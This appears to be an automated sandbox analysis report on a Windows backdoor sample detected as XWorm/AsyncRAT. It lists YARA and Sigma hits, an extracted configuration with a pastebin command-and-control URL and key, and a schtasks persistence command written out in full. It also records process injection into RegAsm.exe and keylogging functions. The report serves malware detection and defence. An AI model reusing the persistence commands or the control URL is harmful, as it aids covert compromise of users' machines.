11.3.Telecom.pif.454d480.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2349:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x23e6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x24fb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1ff7:$cnc4: POST / HTTP/1.1
11.2.Telecom.pif.4552c30.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Telecom.pif.4552c30.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5ba1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5c3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5d53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x584f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.4552c30.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.4552c30.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.454d480.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.454d480.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.3ae5b58.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.3ae5b58.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x319:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5ba1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3b6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5c3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4cb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5d53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x584f:$cnc4: POST / HTTP/1.1
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, ParentCommandLine: 23855\Telecom.pif 23855\R, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, ParentProcessId: 6936, ParentProcessName: Telecom.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, ProcessId: 2056, ProcessName: RegAsm.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2008, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ProcessId: 5868, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", ProcessId: 6772, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 23855\Telecom.pif 23855\R, CommandLine: 23855\Telecom.pif 23855\R, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: 23855\Telecom.pif 23855\R, ProcessId: 6936, ProcessName: Telecom.pif

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", ProcessId: 6772, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Sample uses string decryption to hide its real strings

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: https://pastebin.com/raw/Dh8E7H3R
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <123456789>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <Xwormmm>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: ASGARD
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: USB.exe

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/Dh8E7H3R

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: unknown

DNS traffic detected: query: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

11_2_004BD889

Source: unknown

DNS traffic detected: queries for: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056BB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_004BF7C7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

